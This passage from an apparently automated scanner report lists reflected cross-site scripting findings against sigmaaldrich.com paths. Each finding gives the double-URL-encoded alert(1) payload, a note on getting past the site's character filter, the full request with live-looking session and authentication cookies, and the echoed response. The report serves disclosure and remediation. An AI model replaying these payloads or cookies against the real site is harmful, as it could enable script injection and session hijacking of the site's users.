User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:54 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcc89b7";alert(1)//87ad3930ee4/medialib/labware/labware-icons/filtration","E404") ;
   </script>
...[SNIP]...

1.364. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb029%2522%253balert%25281%2529%252f%252f53b8e84c150 was submitted in the REST URL parameter 2. This input was echoed as cb029";alert(1)//53b8e84c150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibcb029%2522%253balert%25281%2529%252f%252f53b8e84c150/labware/labware-icons/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:55 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibcb029";alert(1)//53b8e84c150/labware/labware-icons/filtration","E404") ;
   </script>
...[SNIP]...

1.365. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfe4%2522%253balert%25281%2529%252f%252f511511f42c6 was submitted in the REST URL parameter 3. This input was echoed as 9dfe4";alert(1)//511511f42c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware9dfe4%2522%253balert%25281%2529%252f%252f511511f42c6/labware-icons/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:57 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware9dfe4";alert(1)//511511f42c6/labware-icons/filtration","E404") ;
   </script>
...[SNIP]...

1.366. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb7e%2522%253balert%25281%2529%252f%252fdfecbe76f2d was submitted in the REST URL parameter 4. This input was echoed as edb7e";alert(1)//dfecbe76f2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsedb7e%2522%253balert%25281%2529%252f%252fdfecbe76f2d/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsedb7e";alert(1)//dfecbe76f2d/filtration","E404") ;
   </script>
...[SNIP]...

1.367. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c455%2522%253balert%25281%2529%252f%252fbd9558297d4 was submitted in the REST URL parameter 5. This input was echoed as 1c455";alert(1)//bd9558297d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/filtration1c455%2522%253balert%25281%2529%252f%252fbd9558297d4 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/filtration1c455";alert(1)//bd9558297d4","E404") ;
   </script>
...[SNIP]...

1.368. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c68%2522%253balert%25281%2529%252f%252f747b3286d23 was submitted in the REST URL parameter 1. This input was echoed as d0c68";alert(1)//747b3286d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcd0c68%2522%253balert%25281%2529%252f%252f747b3286d23/medialib/labware/labware-icons/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
